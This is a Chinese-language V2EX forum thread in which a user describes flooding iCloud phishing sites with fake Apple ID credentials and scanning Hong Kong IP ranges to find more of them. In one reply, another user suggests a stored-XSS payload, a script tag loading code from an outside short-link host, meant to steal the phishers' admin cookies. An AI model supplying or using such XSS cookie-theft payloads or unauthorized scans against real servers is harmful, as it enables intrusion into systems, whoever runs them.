发现一大波 icloud 钓鱼网站。。。

2016-07-21 17:28:00 +08:00
 0x5e

最近同学手机被偷了,不断收到各种骗 appleid 的短信和邮件。。做了点好事,往钓鱼网站里 post 了好多好多假数据,过几天他就关了😁

后来还是不断收到各种钓鱼网站,如法炮制,最后没几天也都关了

再后来发现 ip 基本都是香港的,于是写脚本对部分香港 ip 段扫了下,卧槽扫出 100 多个服务器。。。

于是给他们 post 点假数据:随机 9 位 qq 号 @qq.com/随机密码 不知道有没有用,不过至少按照前面的情况,能让他们都关服就可以了。。

请问各位有没有钓鱼网址提供,如果和我见到的是同类型的,我可以帮忙造点假数据进去。。 标题是 find my iphone ,模仿“找回我的 iPhone ”做的钓鱼网站

http://i2.piimg.com/567571/85f4ce3c10dbe286.jpg

5862 次点击
所在节点    Python
32 条回复
qfdk
2016-07-21 22:08:20 +08:00
@0x5e xssplatform.zip 找一个叫做这个东西的,然后自己搭建。
0x5e
2016-07-21 22:16:59 +08:00
@qfdk 多谢,不过我刚试了下,我扫的这些服务器应该是处理过了。。😁
0x5e
2016-07-21 22:20:08 +08:00
@iwj 写的有点挫,而且钓鱼网站多种多样可能没法通用。。。
https://gist.github.com/0x5e/3125096158adddc45a5a9351a7418942
0x5e
2016-07-21 22:24:08 +08:00
@ctsed 可能吧,不过感觉这网站也挺挫的,要是真心想过滤的话可以搞个 ip 防火墙什么的,说不准也没记录下账号密码对应的 ip ,又或许说不准 ip 是从 X-Forwarded-For 取的。。反正闲着也是闲着我就开着刷一下吧 。。😁
DravenJohnson
2016-07-22 10:02:50 +08:00
还有这东西?
Ra8er
2016-07-22 11:18:06 +08:00
见一个 日一个
njutree
2016-07-22 13:11:09 +08:00
干的漂亮,对于这些人就该给他们大量的假数据让他们干不了坏事。
fishcat
2016-07-22 15:42:47 +08:00
@qfdk 你的那个网站我不能注册
qfdk
2016-07-22 15:46:07 +08:00
@fishcat 上都说了是顺手百度的- - 需要的自己搭建就好了
qfdk
2016-07-22 15:50:07 +08:00
最简单的方法是写个 form ,这样网站的 js 都用不了,然后 user 写上你得到的代码<script src=http://t.cn/Rt2iRuv></script> passwd 也可以,最后这个会插入 他们数据库,如果没有过滤的话,当他们打开你会得到 cookie ,其中还有 keepsession 的选项
meppy
2016-07-22 18:25:43 +08:00
都是高手,学习了
cybermay
2017-03-10 08:35:37 +08:00
你不灌数据他也会关的 骗到了账号就会关 然后再开

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/294004

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX